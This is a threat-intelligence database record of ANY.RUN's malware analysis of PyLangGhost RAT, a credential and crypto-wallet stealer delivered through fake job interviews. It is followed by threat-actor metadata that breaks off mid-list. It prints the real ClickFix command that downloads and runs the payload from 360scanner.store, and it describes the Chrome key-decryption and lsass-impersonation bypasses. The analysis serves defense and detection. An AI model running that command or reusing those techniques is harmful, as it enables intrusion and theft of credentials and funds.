{
	"id": "f6afb4e2-ee1e-486f-8f38-03bdf8ea036d",
	"created_at": "2026-04-06T00:18:52.473117Z",
	"updated_at": "2026-04-10T03:38:19.224084Z",
	"deleted_at": null,
	"sha1_hash": "5974cd546fdb0aebbbbebbba06950740007ecc37",
	"title": "PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology  - ANY.RUN's Cybersecurity Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 122654,
	"plain_text": "PyLangGhost RAT: Rising Stealer from Lazarus Group Striking\r\nFinance and Technology  - ANY.RUN's Cybersecurity Blog\r\nBy Mauro Eldritch\r\nArchived: 2026-04-05 16:04:33 UTC\r\nEditor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence\r\nanalyst. You can find Mauro on X. \r\nNorth Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with\r\na variety of custom malware families. In previous research, we examined strains like InvisibleFerret, Beavertail, and\r\nOtterCookie, often deployed through fake developer job interviews or staged business calls with executives. While\r\nthese have been the usual suspects, a newer Lazarus subgroup, Famous Chollima, has recently introduced a fresh\r\nthreat: PyLangGhost RAT, a Python-based evolution of GoLangGhostRAT. \r\nUnlike common malware that spreads through pirated software or infected USB drives, PyLangGhost RAT is delivered\r\nvia highly targeted social engineering campaigns aimed at the technology, finance, and crypto industries, with\r\ndevelopers and executives as prime victims. In these attacks, adversaries stage fake job interviews and trick their targets\r\ninto believing that their browser is blocking access to the camera or microphone. The “solution” they offer is to run a\r\nscript that supposedly grants permission. In reality, the script hands over full remote access to a North Korean operator. \r\nThis sample was obtained from fellow researcher Heiner García Pérez of BlockOSINT, who encountered it during a\r\nfake job recruitment attempt and documented his findings in an advisory.  \r\nLet’s break it down. \r\nA fake interview process. Source: BlockOSINT\r\nKey Takeaways \r\nAttribution: PyLangGhost RAT is linked to the North Korean Lazarus subgroup Famous Chollima, known for\r\nusing highly targeted and creative intrusion methods. 
\r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 1 of 20\n\nDelivery Method: Distributed through “ClickFix” social engineering, where victims are tricked into running\r\nmalicious commands to supposedly fix a fake camera or microphone error during staged job interviews. \r\nCore Components: The malware’s main loader (nvidia.py) relies on multiple modules\r\n(config.py, api.py, command.py, util.py, auto.py) for persistence, C2 communication, command execution, data\r\ncompression, and credential theft. \r\nCredential \u0026 Wallet Theft: Targets browser-stored credentials and cryptocurrency wallet data from extensions\r\nlike MetaMask, BitKeep, Coinbase Wallet, and Phantom, using privilege escalation and Chrome encryption key\r\ndecryption (including bypasses for Chrome v20+). \r\nC2 Communication: Communicates over raw IP addresses with no TLS, using weak RC4/MD5 encryption, but\r\nremains stealthy with very low initial detection rates (0–3 detections on VirusTotal). \r\nDetection \u0026 Analysis: Identified as 100/100 malicious by ANY.RUN, with telltale signs including the\r\ndefault python-requests User-Agent and multiple rapid requests to C2 infrastructure. \r\nCode Origin: Appears to be a full Python reimplementation of GoLangGhost RAT, likely aided by AI, as\r\nindicated by Go-like logic patterns, unusual code structure, and large commented-out sections. \r\nThe Fake Job Offer Trap \r\nIn the past, DPRK operators have resorted to creative methods to distribute malware, from staging fake job interviews\r\nand sharing bogus coding challenges (some laced with malware, others seemingly clean but invoking malicious\r\ndependencies at runtime), to posing as VCs in business calls, pretending not to hear the victim, and prompting them to\r\ndownload a fake Zoom fix or update. \r\nThis case is a bit different. 
It falls into a newer category of attacks called “ClickFix” — scenarios where the attacker, or\r\none of their websites, presents the victim with fake CAPTCHAs or error messages that prevent them from completing\r\nan interview or coding challenge. The proposed fix is deceptively simple: copy a command shown on the website and\r\npaste it into a terminal or the Windows Run window (Win + R) to “solve the issue.” By doing so, users end up\r\nexecuting malicious scripts with their own privileges, or even worse, as Administrator, essentially handing control of\r\nthe system to a Chollima operator. \r\nA fake “Race Condition” Error, prompting the user to run a command. Source: BlockOSINT\r\nIn this case, the researcher received a fake job offer to work at the Aave DeFi Protocol. After a brief screening with a\r\nfew generic questions, he was redirected to a page that began flooding him with notifications about an error\r\ndubbed “Race Condition in Windows Camera Discovery Cache.” \r\nLuckily, the website offered a quick fix for this “problem”: just run a small code snippet in the terminal. \r\nBut what does this code actually do? Let’s find out. \r\nChollimas \u0026 Pythons \r\nLet’s analyze the command: \r\ncurl -k -o “%TEMP%\\nvidiaRelease.zip” https://360scanner.store/cam-v-b74si.fix \u0026\u0026 powershell -Command\r\n“Expand-Archive -Force -Path ‘%TEMP%\\nvidiaRelease.zip’ \r\n-DestinationPath ‘%TEMP%\\nvidiaRelease'” \u0026\u0026 wscript “%TEMP% \r\n\\nvidiaRelease\\update.vbs” \r\nThis line: \r\nDownloads a ZIP file from 360scanner[.]store using curl. \r\nExtracts it to the %TEMP%\\nvidiaRelease directory using PowerShell’s Expand-Archive. \r\nExecutes a VBScript named update.vbs via wscript. 
\r\nupdate.vbs contents\r\nNow let’s look at what this script actually does:\r\nInside update.vbs \r\nIt silently decompresses Lib.zip to the same directory, using tar, and waits for the extraction to finish, hiding any\r\nwindows during the process. \r\nThen, it runs csshost.exe nvidia.py. The filename csshost.exe is mildly obfuscated by being split in two parts (“css” \u0026\r\n“host.exe”) before execution. \r\nDisguised Python Environment \r\nBut what is csshost.exe? \r\nIt’s actually a renamed python.exe binary. Nothing more. No packing, no exotic tricks; just Python, rebranded. \r\nThe Lib.zip file is a clean Python environment bundled with standard libraries, containing nothing malicious or\r\nunusual. \r\nLib.zip contents, clean\r\nA Decoy and Its Real Payload \r\nFunny enough, if you try to download the same file manually with a different User-Agent, the server returns a\r\nlegitimate driver instead — a clever decoy tactic. \r\nOn the other hand, nvidia.py imports three additional components: api.py, config.py, and command.py. The last one, in\r\nturn, also uses util.py and auto.py.  \r\nCore Modules and Their Roles \r\nLet’s break down the three modules, starting with config.py. \r\nThis file defines a set of constants used throughout the malware lifecycle, including message types, command codes,\r\nand operational parameters. 
\r\nHere’s a quick reference of the command dictionary defined in config.py: \r\nCode Function\r\nqwer  Get system information \r\nasdf  Upload a file \r\nzxcv  Download a file \r\nvbcx  Open a terminal session \r\nqalp  Detach terminal (background) \r\nghd  Wait \r\n89io  Gather Chrome extension data \r\ngi%#  Exfiltrate Chrome cookie store \r\nkyci  Exfiltrate Chrome keychain \r\ndghh  Exit the implant \r\nCommand dictionary on config.py\r\nImmediately after that, a C2 server based in the United Kingdom is declared (some sources indicate “Private Client –\r\nIran”), along with a registry key used for persistence, and a list of Chrome extensions targeted for exfiltration, including\r\nMetaMask, BitKeep, Coinbase Wallet, and Phantom. \r\nExtensions list, C2 server and persistence key\r\nComing up next, api.py manages communication with the C2 server we just saw on config.py. There are three main\r\nfunctions: \r\n1. Packet0623make, which uses the RC4 cipher to encrypt data in transit, builds a packet and computes a\r\nchecksum. RC4 is obsolete and weak but simple, which may explain the choice. \r\n2. Packet0623decode, which validates the checksum and decrypts the packet. \r\n3. Htxp0623Exchange, which simply posts the packet to the server without TLS encryption, thus making the RC4\r\nand MD5 cocktail an even weaker choice. \r\nPackage building using RC4\r\nNow command.py acts as a dispatcher, interpreting both malware logic and C2 communications, and executing\r\ninstructions accordingly. It also handles status messages defined in the config.py module we examined earlier. 
\r\nThe key functions are: \r\nFunction  Description \r\nProcessInfo  Collects the current user, hostname, OS, architecture, and the malware (daemon) version. \r\nProcessUpload  Allows the attacker to upload compressed files to the victim’s machine. \r\nProcessDownload  Stages files or folders for exfiltration. If the target is a folder, it gets compressed before\r\ntransmission. \r\nProcessTerminal  Opens a reverse shell or executes arbitrary commands, depending on the mode selected. \r\nmakeMsg0623 / decodeMsg0623  Serialize and deserialize base64-encoded messages exchanged between implant\r\nand C2. \r\nProcessAuto  Triggers automation routines from the auto.py module. \r\nFunction to open a reverse shell or run arbitrary commands\r\nYou probably remember that command.py imports two other custom modules: util.py and auto.py. Let’s review them\r\nas well. \r\nModule util.py implements three functions: \r\nFunction  Description \r\ncom0715press  Compresses files in-memory as .tar.gz \r\ndecom0715press  Extracts .tar.gz files from memory to disk \r\nvalid0715relPath  Validates relative paths to prevent path traversal \r\nAuxiliary functions from util.py\r\nFinally, the last and most critical module: auto.py. \r\nThis module implements two key functions: \r\nAutoGatherMode: Collects configuration data from cryptocurrency browser extensions such as MetaMask,\r\nBitKeep, Coinbase Wallet, and Phantom. \r\nAutoCookieMode: Extracts login artifacts, including credentials and cookies, from Google Chrome. \r\nThe autoGatherMode function searches for the user’s Google Chrome profile directory\r\n(AppData\\Local\\Google\\Chrome\\User Data), starting with the Default profile and then enumerating others. 
It\r\ncompresses the configuration directories of the targeted extensions into a single archive named gather.tar.gz and\r\nexfiltrates it for manual analysis, with the goal of enabling account takeover or compromising cryptocurrency wallets. \r\nExfiltrating Google Chrome Profiles in a compressed file\r\nWith the rise of information-stealing malware, browser vendors have introduced various countermeasures to protect\r\nsensitive data such as password managers, cookies, and encrypted storage vaults. Chrome is no exception. To bypass\r\nthese protections, the malware includes functions designed to check whether the user has administrative privileges and\r\nto retrieve Chrome’s encryption key through different methods, depending on the browser version, as the protection\r\nmechanisms vary. \r\nThe autoCookieMode function, on the other hand, starts by checking if the user has administrative privileges. If not, it\r\nrelaunches itself using runas, triggering a UAC (User Account Control) prompt. The prompt is intentionally deceptive: it\r\nsimply displays “python.exe” as the requesting binary, providing no additional context or visual indicators. This subtle\r\nform of social engineering increases the likelihood of the user granting permission. \r\nIf the prompt is accepted, the malware gains elevated privileges, which are necessary to interact with privileged APIs\r\nsuch as the Data Protection API (DPAPI) used to retrieve Chrome’s encryption keys. If the user declines, the malware\r\ncontinues execution with the current user’s privileges. \r\nMalicious UAC prompt\r\nIt then creates a file named chrome_logins_dump.txt to store the extracted credentials. To do so, it accesses Chrome’s\r\nLocal State file, which contains either an encrypted_key (in v10) or an app_bound_encrypted_key (in v20+). 
These\r\nkeys are not stored in plaintext but encoded in Base64 and encrypted using Windows DPAPI. While they are accessible\r\nto the current user, they require decryption before use. \r\nGoogle Chrome Keys Harvesting\r\nIn Chrome v10, the encryption key is protected solely by the user’s DPAPI context and can be decrypted directly. In\r\nChrome v20 and later, the key is app-bound and encrypted twice — first with the machine’s DPAPI context, and then\r\nagain with the user’s. To bypass this layered protection, the malware impersonates the lsass.exe process to temporarily\r\ngain SYSTEM privileges. \r\nImpersonating lsass.exe\r\nIt then applies both layers of decryption, yielding a key blob which, once parsed, reveals the AES master key used to\r\ndecrypt Chrome’s stored credentials. \r\nOnce the key is obtained by either method, the malware connects to the Login Data SQLite database and extracts all\r\nstored credentials, applying the corresponding decryption logic for v10 or v20 entries depending on the case. \r\nCredentials dumped by the process\r\nAt this point, it’s game over for the victim. \r\nWith the module functionality now understood, the next step is to examine the malware’s core component: nvidia.py.\r\nBefore diving in, here’s a summary of the auxiliary functions contained in this module. \r\ncheck_adminRole: Checks if the current process has administrative privileges using IsUserAnAdmin(). \r\nGetSecretKey: Extracts and decrypts the AES key used by Chrome (v10) from the Local State file using DPAPI. \r\nDecryPayload: Decrypts a payload using a given cipher. \r\nGenCipher: Constructs an AES-GCM cipher object using a given key and IV. \r\nDecryPwd: Decrypts v10-style Chrome passwords using AES-GCM and the secret key obtained via DPAPI. 
\r\nimpersonate_lsass: Context manager that impersonates the lsass.exe process to gain SYSTEM privileges. \r\nparse_key_blob: Parses Chrome’s v20 encrypted key blob structure to extract the IV, ciphertext, tag, and (if\r\npresent) encrypted AES key. \r\ndecrypt_with_cng: Decrypts data using the Windows CNG API and a hardcoded key name (“Google\r\nChromekey1”). \r\nbyte_xor: Performs XOR between two byte arrays (used to unmask the AES key in v20 key blobs). \r\nderive_v20_master_key: Decrypts and derives the AES master key from parsed v20 Chrome blobs, supporting\r\nmultiple encryption flags (AES, ChaCha20, masked AES). \r\nFrom Recon to Full Control \r\nNow, to the core component: nvidia.py. \r\nThis module begins by registering a registry key to establish persistence, assigning a unique identifier (UUID) to the\r\nhost, and creating a pseudo–mutex-like mechanism via a .store file to prevent multiple instances from running\r\nsimultaneously. It then enters a loop, continuously listening for new instructions from the C2 server. Additionally, it\r\nsupports standalone execution with specific command-line arguments, enabling it to immediately perform actions such\r\nas stealing cookies or login data. \r\nAnalysis in ANY.RUN shows that all communication with the C2 servers is carried out over raw IP addresses, with no\r\ndomain names used. While the traffic is not encrypted with TLS, it is at least obfuscated using RC4, a weak method but\r\nstill an added layer of concealment. \r\nView real case inside ANY.RUN sandbox \r\nTraffic to the C2 Server\r\nThe sandbox quickly flags the traffic as suspicious. Because the malware uses the default python-requests User-Agent\r\nand sends multiple rapid requests, this pattern becomes a reliable detection indicator. 
\r\nTraffic is automatically marked as suspicious\r\nAnother key observation: most of the malware artifacts used in this campaign register only 0 to 3 detections on\r\nVirusTotal, making them particularly stealthy. Fortunately, ANY.RUN immediately identifies these samples as 100/100\r\nmalicious, starting with the initial update.vbs loader. \r\nupdate.vbs loader marked as malicious\r\nOther components, including nvidia.py, the main launcher, are also flagged instantly with a 100/100 score, providing\r\nearly warning against this evolving threat. \r\nnvidia.py loader marked as malicious\r\nNew malware, you say? Let’s take a closer look. \r\nGophers, Ghosts \u0026 AI \r\nA variant of this sample was recently observed by other security laboratories, which noted strong similarities\r\nto GoLangGhost RAT. In fact, this appears to be a full reimplementation of that RAT in Python, but with a notable\r\ntwist. \r\nAnalysis revealed numerous linguistic patterns and unusual coding constructions, including dead code, large\r\ncommented-out sections, and Go-style logic structures, suggesting that the port from Go to Python was at least partially\r\nassisted by AI tools. \r\nGhosts, Gophers, Pythons, and AI, all converging in a single malware family. \r\nLet’s go to the ATT\u0026CK Matrix now, which ANY.RUN builds automatically. \r\nPyLangGhost RAT ATT\u0026CK Details \r\nPyLangGhost RAT shares several tactics, techniques, and procedures (TTPs) with its related families,\r\nOtterCookie, InvisibleFerret, and BeaverTail, but also introduces some new ones: \r\nT1036  Masquerading  Renames legitimate binaries such as python.exe to csshost.exe. \r\nT1059  Command and Scripting Interpreter  Initiates execution by using wscript.exe to run update.vbs and csshost.exe\r\nto launch the nvidia.py loader. 
\r\nT1083  File and Directory Discovery  Enumerates user profiles and browser extensions. \r\nT1012  Query Registry  Gains persistence via registry entries created by the update.vbs script. \r\nMITRE ATT\u0026CK Matrix\r\nBusiness Impact of PyLangGhost RAT \r\nPyLangGhost RAT poses a significant risk to organizations in the technology, finance, and cryptocurrency sectors, with\r\npotential consequences including: \r\nFinancial losses: Compromised cryptocurrency wallets and stolen credentials can lead directly to asset theft and\r\nfraudulent transactions. \r\nData breaches: Exfiltration of sensitive corporate data, browser-stored credentials, and internal documents can\r\nexpose intellectual property, customer information, and strategic plans. \r\nOperational disruption: Persistent remote access allows attackers to move laterally, deploy additional\r\npayloads, and disrupt business-critical systems. \r\nReputational damage: Public disclosure of a breach tied to a high-profile state-sponsored group can undermine\r\nclient trust and brand credibility. \r\nRegulatory consequences: Data theft incidents may trigger compliance violations (e.g., GDPR, CCPA,\r\nfinancial regulations) resulting in legal penalties and reporting obligations. \r\nGiven its low detection rate and targeted social engineering approach, PyLangGhost RAT enables attackers to operate\r\ninside a network for extended periods before discovery, increasing both the scope and cost of an incident. \r\nHow to Fight Against PyLangGhost RAT \r\nDefending against PyLangGhost RAT requires a combination of proactive detection, security awareness, and layered\r\ndefenses: \r\nUse behavior-based analysis: Solutions like ANY.RUN’s Interactive Sandbox can detect PyLangGhost RAT\r\nin minutes by exposing its execution chain, raw IP C2 connections, and credential theft activity. 
\r\nValidate unexpected commands: Educate employees to never run commands or scripts provided during job\r\ninterviews or online “technical tests” without verification from security teams. \r\nRestrict administrative privileges: Limit the ability for standard users to run processes with elevated rights,\r\nreducing the malware’s ability to retrieve encrypted browser keys. \r\nMonitor for anomalous network traffic: Look for unusual outbound connections to raw IPs or rapid repeated\r\nHTTP requests from unexpected processes. \r\nHarden browser data security: Apply policies to clear cookies and credentials regularly, disable unneeded\r\nbrowser extensions, and enforce hardware-backed encryption where available. \r\nIncident response readiness: Maintain a process for rapid sandbox testing of suspicious files or scripts to\r\nshorten investigation times and reduce business impact. \r\nSpot Similar Threats Early, Minimizing Business Risk \r\nWhen facing dangerous malware like PyLangGhost RAT, speed of detection is important. Every minute an attacker\r\nremains undetected increases the chances of stolen data, financial loss, and operational disruption. \r\nANY.RUN’s Interactive Sandbox helps organizations identify and analyze threats like PyLangGhost RAT within\r\nminutes, combining real-time execution tracking with behavior-based detection to uncover even low-detection or newly\r\nemerging malware. \r\nRapid incident response: Detect threats early to stop lateral movement, data exfiltration, and further\r\ncompromise. \r\nLower investigation costs: Automated analysis delivers verdicts quickly, reducing the time and resources\r\nneeded for manual investigation. \r\nFaster, smarter decisions: Clear visualized execution flows help security teams assess impact and choose the\r\nright containment measures. \r\nIncreased SOC efficiency: Streamlines detection, analysis, and reporting in one workflow, eliminating\r\nunnecessary manual steps. 
\r\nProactive threat hunting: Flags stealthy or low-signature artifacts, enabling defenders to identify and block\r\nsimilar threats before they spread. \r\nEarly detection for business means lower risk, reduced costs, and stronger resilience against advanced cyberattacks. \r\nTry ANY.RUN to see how it can strengthen your proactive defense \r\nGathered IOCs \r\nFileName: chrome_logins_dump.txt\r\nFileName: gather.tar.gz\r\nMutex: .store \r\nFurther Reading \r\nhttps://otx.alienvault.com/pulse/688186afb933279c4be00337\r\nhttps://app.any.run/tasks/275e3573-0b3e-4e77-afaf-fe99b935c510 \r\nhttps://www.virustotal.com/gui/file/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940/detection \r\nhttps://www.virustotal.com/gui/file/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1\r\nhttps://www.virustotal.com/gui/file/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb/community\r\nMauro Eldritch\r\nMauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina / Uruguay). He has\r\nspoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and\r\nBiohacking. 
He currently leads Bitso’s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://any.run/cybersecurity-blog/pylangghost-malware-analysis/"
	],
	"report_names": [
		"pylangghost-malware-analysis"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7187a642-699d-44b2-9c69-498c80bce81f",
			"created_at": "2025-08-07T02:03:25.105688Z",
			"updated_at": "2026-04-10T02:00:03.78394Z",
			"deleted_at": null,
			"main_name": "NICKEL TAPESTRY",
			"aliases": [
				"CL-STA-0237 ",
				"CL-STA-0241 ",
				"DPRK IT Workers",
				"Famous Chollima ",
				"Jasper Sleet Microsoft",
				"Purpledelta Recorded Future",
				"Storm-0287 ",
				"UNC5267 ",
				"Wagemole "
			],
			"source_name": "Secureworks:NICKEL TAPESTRY",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d05e8567-9517-4bd8-a952-5e8d66f68923",
			"created_at": "2024-11-13T13:15:31.114471Z",
			"updated_at": "2026-04-10T02:00:03.761535Z",
			"deleted_at": null,
			"main_name": "WageMole",
			"aliases": [
				"Void Dokkaebi",
				"WaterPlum",
				"PurpleBravo",
				"Famous Chollima",
				"UNC5267",
				"Wagemole",
				"Nickel Tapestry",
				"Storm-1877"
			],
			"source_name": "MISPGALAXY:WageMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
